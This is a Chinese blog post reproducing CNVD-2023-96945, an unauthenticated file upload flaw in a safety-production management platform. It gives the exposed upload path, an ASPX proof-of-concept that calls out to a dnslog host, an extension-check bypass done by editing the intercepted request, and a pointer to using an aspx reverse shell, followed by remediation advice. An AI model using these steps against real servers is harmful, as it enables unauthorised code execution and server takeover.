CNVD-2023-96945

已于 2024-02-18 16:54:58 修改
阅读量394 收藏 4
点赞数 3
文章标签: 安全
于 2024-02-05 09:31:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42628854/article/details/136036109
版权
文章报道了安全生产数字化管理平台存在的未授权文件上传漏洞,可通过恶意文件上传获取服务器权限。复现步骤包括利用脚本上传特定文件和修改参数。修复建议强调了文件类型、名称、内容检查以及权限设置的重要性。
摘要由CSDN通过智能技术生成

漏洞编号:CNVD-2023-96945

安全生产数字化管理平台存在未授权文件上传漏洞。

漏洞描述:

系统存在的文件上传功能可被未授权访问使用并且未做好文件上传限制,导致恶意用户可上传恶意文件并解析,直接获取服务器权限。

复现步骤:

1.访问路径/Content/Plugins/uploader/FileChoose.html可直接使用未授权的文件上传功能。

2.本次测试使用的ping.aspx脚本内容为:

<%@ Page Language="C#" %>

<script runat="server">
protected void Page_Load(object sender, EventArgs e)
{
string ipAddress = "up1.kbtxvc.ceye.io"; // 替换为要 ping 的固定地址

System.Diagnostics.Process process = new System.Diagnostics.Process();
process.StartInfo.FileName = "ping";
process.StartInfo.Arguments = ipAddress;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();

string output = process.StandardOutput.ReadToEnd();
process.WaitForExit();
}
</script>

此脚本仅测试文件上传解析情况,获取服务器权限可使用aspx反弹脚本。

3.将使用的aspx脚本保存重命名未ping.png,绕过前端文件后缀校验,选择ping.png并抓包,第一个数据包无需更改,直接放过。

第二个数据包修改fileName参数,即为保存到服务器的文件名,修改为aspx后缀

第三个数据包返回上传到服务器后的文件保存路径与文件名。

4.根据路径访问上传的aspx文件,aspx程序被解析执行,收到dnslog日志。

修复建议:

1.文件类型检查:在服务器端对上传的文件进行类型检查,防止上传不合法的文件类型。可以使用白名单机制,只允许上传特定的文件类型。

2.文件名检查:避免使用原始文件名,生成新的随机文件名,并且保证唯一性。

3.文件内容检查:使用杀毒软件或者其他安全工具对上传的文件进行扫描,识别是否存在恶意代码。

4.文件权限设置:上传的文件应该存储在一个独立的目录下,该目录的访问权限应该限制为最小化。

福瑞二姨
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LiveGBS user/save 逻辑缺陷漏洞复现(CNVD-2023-72138)
0xSec
04-30 447
LiveGBS user/save 接口处存在逻辑缺陷漏洞,未经身份验证的攻击者可利用该漏洞任意添加用户,导致后台服务被接管,造成信息泄露等不良影响。
EduSoho教培系统 任意文件读取漏洞复现(CNVD-2023-03903)
0xSec
12-15 1143
该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后,攻击者可以结合symfony框架_fragment路由实现RCE
探索 Nacos反序列化漏洞CNVD-2023-45001
修己xj的博客
04-19 582
安全是软件开发过程中的重中之重,漏洞修复和安全加固工作应该得到充分重视。针对 Nacos 反序列化漏洞,我们应该及时采取措施修复漏洞,保障系统的安全稳定运行。
【漏洞复现】CNVD-2023-08743
zkaqlaoniao的博客
10-30 197
title=”人力资源信息管理系统”
Apache ActiveMQ 远程代码执行漏洞复现(CNVD-2023-69477)
huangyongkang666的博客
10-31 5778
上周爆出来的activeMQ远程代码执行漏洞,正好做一下漏洞复现,记录一下。
CNVD-2023-08743:宏景HCM SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
11-07 1943
宏景HCM系统 categories处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
CNVD-2023-12632 泛微e-cology9 sql注入 附poc
三天不打上房揭瓦的博客
03-18 4851
由于泛微e-cology9中对用户前台输入的数据未做校验,可以通过构造恶意的数据包导致SQL注入漏洞,进一步获取敏感数据。
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 ...拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
CNVD-2019-34241 SQL注入.MD
03-20
CNVD-2019-34241 SQL注入.MD
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1302
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
如何安全的申请SSL证书
2401_86337938的博客
07-22 1552
DV级别的证书只验证域名所有权,OV级别证书除了验证域名所有权外还会验证单位组织信息,EV级别的证书除了验证域名所有权、单位组织信息外还会验证详细组织业务信息。一旦你的证书被批准,你会收到一个包含证书文件的邮件。最后,在选择SSL证书时,也要注意选择受信任的可信根CA颁布的SSL证书,可以先向JoySSL官网工作人员发送自己需要保护的域名,提交自己所需要的证书类型,注册时填写。首先选择在授权的JoySSL提供商或者是受信任的证书颁发机构选择适合的证书类型。详细的公司信息验证,用于银行、电商等敏感行业。
哪个邮箱最安全最好用啊
Zoho_Mail的博客
07-23 1406
Zoho企业邮箱,采用加密技术、反垃圾邮件和病毒保护,支持多因素认证,确保数据安全合规,同时提供易用性集成和移动应用。对公司,电子邮件可能带上商业计划、顾客信息、财务报表等保密信息,泄露可能导致竞争者掌握,危害企业的竞争优势与信誉。邮件炸弹进攻:很多垃圾短信的涌入可能导致邮箱服务器负荷,危害工作邮件的接收和推送,进而影响业务运作。登陆凭据、医疗记录、专利等敏感信息,一旦泄露,可能对个人或企业导致不可逆转的伤害。遵守国际安全标准和法规,如GDPR、HIPAA等,保证用户数据的合法处理和保护。
网站被浏览器提示“不安全”,如何解决
ABCDEFK1234的博客
07-24 599
网站被浏览器提示“不安全”,如何解决
【创新未发表】Matlab实现黏菌优化算法SMA-Kmean-Transformer-LSTM负荷预测算法研究.rar
最新发布
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
PyTorch使用教程.pdf
07-29
PyTorch 是一个开源的机器学习库,广泛用于计算机视觉和自然语言处理等领域。以下是一个简化的 PyTorch 使用教程,不采用分点或Markdown格式。 首先,确保你安装了 PyTorch。你可以通过访问 PyTorch 官网获取安装指令,根据你的系统环境(如 Windows, macOS, Linux)和是否使用 GPU 支持进行安装。 安装完成后,你可以开始编写 PyTorch 代码了。 这里,我们将通过一个简单的例子来展示 PyTorch 的基本用法:创建一个简单的神经网络来识别手写数字(基于 MNIST 数据集)。
cnvd-2023-69477
12-08
cnvd-2023-69477是一个由国家信息安全漏洞共享平台发布的漏洞通告编号,该漏洞通告是针对特定软件或硬件产品的安全漏洞描述和修复建议的一个标识。根据cnvd-2023-69477的描述,这个漏洞可能会导致系统的信息泄露、拒绝服务或者远程代码执行等安全风险。建议用户及时关注厂商发布的安全补丁,并严格按照厂商提供的修复建议进行操作,确保系统的安全性。 对于系统管理员和安全工程师来说,他们需要关注cnvd-2023-69477的具体描述和风险评估,及时评估自身系统是否受到影响,快速制定修复计划并进行安全补丁的安装和验证。同时,建议关注该漏洞的后续动态,以便获取更多关于漏洞的详细信息和最新修复方案,及时做好安全防护工作。 总之,cnvd-2023-69477作为一个漏洞通告,提醒着用户和安全从业人员关注系统安全,及时采取措施保护系统,防范潜在的安全风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值